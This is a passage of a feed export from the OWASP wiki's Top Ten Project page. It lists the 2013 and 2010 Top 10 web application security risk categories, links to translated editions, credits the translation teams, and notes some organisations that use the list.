* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235461</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235461"/>
				<updated>2017-11-14T22:14:07Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: /* Project Sponsors */ Put in Autodesk, remove Aspect logo.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 RC2 Released==&lt;br /&gt;
